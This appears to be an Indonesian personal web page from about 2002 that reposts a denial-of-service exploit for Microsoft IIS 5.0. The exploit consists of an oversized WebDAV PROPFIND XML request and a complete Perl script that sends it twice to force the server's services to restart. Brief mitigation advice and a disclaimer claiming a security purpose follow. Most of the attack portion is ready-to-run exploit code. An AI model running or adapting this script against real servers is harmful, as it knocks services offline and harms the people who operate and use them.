Make your own free website on Tripod.com

 

WELCOME TO MY PAGE

 

HOME

Info Virus

Cerita Gaib

Mp3

Fotoku

Babad

Tips WIndows XP

DoS pada IIS 5.0

Hack pakai MIRC

War Script Mirc

 

Bug terbaru pada produk Microsoft ini cukup untuk memperlengkap daftar bug yang ada pada produk mereka.
Dengan menggunakan bug ini anda dapat melakukan remote restart semua service yg ada di IIS dengan menggunakan 
request yg cukup spesifik. Selain itu IIS juga dapat di perintahkan untuk menggunakan memory yg sudah terpakai sehingga 
dapat menyebabkan buffer overflow, untuk masalah exploit kayaknya masih belum dapat dilakukan. Kalo iseng-iseng sih dapat 
dikategorikan dengan DoS attack.

 

Systems affected:
IIS 5.0

Detail:
Contoh  request yg dapat digunakan untuk create DoS.

 ---------------------
<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:$over /></a:prop>
</a:propfind>
---------------------
length($over) ~ 128008

Request pertama akan di reply oleh IIS tetapi pada kedua kalinya service-service yang ada  di IIS akan restart.

--vv5.pl-------------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];
$host = @ARGV[0];

sub vv()
{

$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow

$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";

$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}

do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";
---------------------------------------------------------------------------

Solution :
Disable WebDav extensions and PROPFIND

DISCLAIMER:
Informasi code yg saya terima tidak saya ubah.
Maka saya tidak menjamin atau bertanggung jawab jika code yg disertakan disini mengakibatkan kerusakan.
Info yg saya sediakan hanya utk tujuan security system anda.

 

Send mail to nugraha_swadharma@yahoo.com apabila ada pertanyaan atau komentar tentang web site ini.
Copyright 2002 Nugraha
Last modified: 29-05-03